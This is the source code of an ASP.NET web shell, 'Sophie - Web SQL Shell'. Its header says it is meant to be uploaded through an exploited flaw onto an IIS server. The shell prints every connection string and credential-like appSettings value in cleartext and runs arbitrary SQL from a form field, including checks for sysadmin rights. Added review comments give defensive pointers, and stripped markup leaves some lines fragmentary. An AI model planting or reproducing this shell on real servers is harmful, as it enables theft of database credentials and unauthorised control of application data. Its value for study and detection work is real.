<%
' If you can exploit a flaw to upload files to an executable directory in an IIS environment,
' this script parses web.config for connection strings and allows you to execute SQL queries
' Author: Jerome Smith @exploresecurity
' Version: 0.2
' http://www.7safe.com
' http://www.exploresecurity.com
' Licence: free to modify and then distribute if you retain original credits, otherwise grateful if you refer to original download link, thank you
' To do: auto xp_cmdshell detection and re-enabling if possible
' information_schema viewer / simplified query tool to save all that typing
' add traditional web shell
'
' NOTE(review): page layout. All server-code blocks below belong to one render pass, so variables
' declared in one block (connStrings, index) are reused by later ones. The flow is:
'   1. enumerate ConfigurationManager.ConnectionStrings and echo name + value into the response;
'   2. scan ConfigurationManager.AppSettings for keys/values that look like connection strings;
'   3. open the selected entry (ODBC if the string mentions "DSN", otherwise SqlClient) and run
'      either the fixed "Get Info" probes or the text posted in Request.Form("sql").
' NOTE(review): defensive reading. Everything this page reads comes from the application's own
' configuration and runs under the application's identity, so protected-configuration encryption
' of the connectionStrings section does not hide the values from it (ConfigurationManager
' decrypts transparently for the application). What limits the impact is a least-privilege
' database login, no write access to script-mapped directories, and alerting on new .aspx files
' that combine ConfigurationManager.ConnectionStrings/AppSettings with ExecuteReader on a
' Request.Form value.
' NOTE(review): the HTML inside the Response.Write string literals was stripped when this page was
' extracted, which is why several calls below appear as Response.Write("") or span several lines.
%>
<% @ Page Language="VB" %>
<% Response.Buffer=True %>
Sophie - Web SQL Shell

Connection Strings


<%
' Step 1: every connection string the configuration system exposes to this application.
' NOTE(review): ConfigurationManager.ConnectionStrings is the merged view, so entries inherited
' from machine-level config that the application never uses may appear here as well.
Dim css = ConfigurationManager.ConnectionStrings
''' Collect all the connection strings in an array
' VB sizes arrays by upper bound, so connStrings(css.Count) has css.Count + 1 slots; the spare last
' slot is where the appSettings scan further down starts appending (index = connStrings.Length - 1).
Dim connStrings(css.Count) As String
For i As Integer = 0 To css.Count - 1
    ' One table row per entry: Name, then the raw ConnectionString (credentials included, in
    ' cleartext), which is also stored in connStrings(i) for the Execute step. The markup and those
    ' writes were stripped on extraction; the leftover fragment appears two lines below.
    Response.Write("")
Next i
%>
Select Name Connection String
") Response.Write("") Response.Write(css.Item(i).Name) Response.Write("") Response.Write(css.Item(i).ConnectionString) connStrings(i) = css.Item(i).ConnectionString Response.Write("

By default this script tries to identify connection strings from <appSettings> by looking for certain keywords in the key name and value.
<%
' Hint text for the appSettings table: which button toggles between the keyword-filtered view and
' the full key dump. Request.Form("getAll") is the carried-over state for Get Info / Execute posts.
' NOTE(review): VB string comparison treats Nothing like "", so an absent field and an empty one
' take the same branch here.
if Request.Form("submit") = Nothing or Request.Form("submit") = "Revert" or ((Request.Form("submit") = "Get Info" or Request.Form("submit") = "Execute") and Request.Form("getAll") = Nothing) then
    Response.Write("To see all keys, click the Get All button.

")
else
    Response.Write("To go back to the default list, click the Revert button.

")
end if
%>
<%
' Step 2: scan appSettings for values that look like connection strings and append them to
' connStrings (declared in the block above) so they can be selected for Execute / Get Info.
' index starts at the spare last slot that Dim connStrings(css.Count) left free.
Dim index = connStrings.Length - 1
Dim key, value
Dim getAll = False
For Each key in ConfigurationManager.AppSettings
    value = ConfigurationManager.AppSettings(key)
    ' "Get All" (or a later post that still carries getAll) disables the keyword filter for the
    ' whole loop: getAll is set on the first iteration and never cleared.
    if Request.Form("submit") = "Get All" or ((Request.Form("submit") = "Get Info" or Request.Form("submit") = "Execute") and Request.Form("getAll") <> Nothing) then
        ' NOTE(review): markup stripped on extraction; presumably this re-emits the getAll hidden
        ' field, and because it sits inside the loop it is written once per key - confirm against
        ' the original.
        Response.Write("")
        getAll = True
    end if
    ''' Look for evidence of a connection string by keywords (it is big but it's not clever)
    ' Case-insensitive match: "con" in the key name, or DSN/data/source/database/server/uid/user
    ' anywhere in the value.
    if getAll or key.IndexOf("con", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("DSN", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("data", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("source", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("database", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("server", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("uid", StringComparison.OrdinalIgnoreCase)>-1 or value.IndexOf("user", StringComparison.OrdinalIgnoreCase)>-1 then
        ' Table row for the match (markup stripped on extraction; the fragment two lines below is
        ' its content: key, then the raw value). The value is also stored for the Execute step.
        Response.Write("")
        connStrings(index) = ConfigurationManager.AppSettings(key)
        ''' Expand the array by 1 and keep current values
        ReDim Preserve connStrings(connStrings.Length)
        index = index + 1
    end if
Next
%>
Select Name Connection String
") Response.Write("") Response.Write(key) Response.Write("") Response.Write(ConfigurationManager.AppSettings(key)) Response.Write("


<%
' Step 3: open the selected connection string and render query results as a table.
' NOTE(review): the statement text is either the fixed "Get Info" probe set or Request.Form("sql")
' verbatim, executed with whatever credentials the chosen connection string carries - the database
' sees the request as the application itself, so a least-privilege application login is the
' control that bounds it. On SQL Server, @@version / db_name() / is_srvrolemember queries arriving
' on the application login are an audit signal the legitimate application would not normally produce.
Response.Write("


")
if Request.Form("cs") = "" then
    Response.Write("No connection string set")
else if Request.Form("submit") = "Execute" or Request.Form("submit") = "Get Info" then
    ' The form value is used directly as an index into connStrings (late-bound conversion to
    ' Integer). A non-numeric or out-of-range value throws here, before the Try, so it surfaces as
    ' an unhandled ASP.NET error rather than the "Something went wrong..." text below.
    Dim connStr = connStrings(Request.Form("cs"))
    Dim odbc = False
    ' Untyped Object locals (the page relies on Option Strict Off); both start as Nothing, which
    ' the Finally block depends on.
    Dim conn, reader
    Try
        ' Provider selection is a heuristic: "DSN" anywhere in the string means ODBC, else SqlClient.
        if connStr.IndexOf("DSN", StringComparison.OrdinalIgnoreCase)>-1 then
            conn = New System.Data.Odbc.OdbcConnection(connStr)
            odbc = True
        else
            conn = New System.Data.SqlClient.SqlConnection(connStr)
        end if
        conn.Open()
        Dim cmd, infoQueries
        Dim getInfo = False
        ' infoQueries is a 2-D array of {sql, label}; the label is only rendered in Get Info mode.
        if Request.Form("submit") = "Get Info" then
            infoQueries = New String(,) { {"SELECT @@version","server"}, {"SELECT db_name()","database"}, {"SELECT user","user"}, {"SELECT system_user","system_user"}, {"SELECT is_srvrolemember('sysadmin')","sysadmin?"}, {"SELECT is_srvrolemember('serveradmin')","serveradmin?"} }
            getInfo = True
        else
            infoQueries = New String(,) { {Request.Form("sql"),""} }
        end if
        Response.Write("")
        ' index is the variable declared in the appSettings block above, reused as the query counter.
        For index = 0 to infoQueries.GetUpperBound(0)
            if odbc then
                cmd = New System.Data.Odbc.OdbcCommand(infoQueries(index,0), conn)
            else
                cmd = New System.Data.SqlClient.SqlCommand(infoQueries(index,0), conn)
            end if
            reader = cmd.ExecuteReader()
            if Not reader.hasRows then
                Response.Write("
No rows returned")
            end if
            Dim colNames As Boolean = True
            ''' Read a row at a time
            While reader.Read()
                Response.Write("")
                Dim i as Integer
                ''' If Get Info requested, output a friendly name to describe each query
                if getInfo then
                    Response.Write("" & infoQueries(index,1) & "")
                    colNames = False
                end if
                ''' The first row of output should be the column names
                if colNames then
                    For i = 0 To reader.FieldCount - 1
                        Response.Write("")
                        Response.Write(reader.GetName(i))
                        Response.Write("")
                    Next
                    Response.Write("")
                end if
                ' Cell values go through Response.Write(Object), i.e. unencoded; any markup stored
                ' in the database lands in the page as-is.
                For i = 0 To reader.FieldCount - 1
                    Response.Write("")
                    Response.Write(reader.GetValue(i))
                    Response.Write("")
                Next
                Response.Write("")
                colNames = False
            End While
            reader.Close()
        Next
    Catch ex As Exception
        ' The raw provider message (typically the SQL Server error text) is echoed to the client.
        Response.write("Something went wrong...
" & ex.Message & "
")
    Finally
        ' Only close what was actually opened; reader/conn are still Nothing if Open or
        ' ExecuteReader threw.
        if reader isNot Nothing then
            reader.Close()
        end if
        if conn isNot Nothing then
            conn.Close()
        end if
        Response.Write("")
        Response.Write("")
    End Try
end if
%>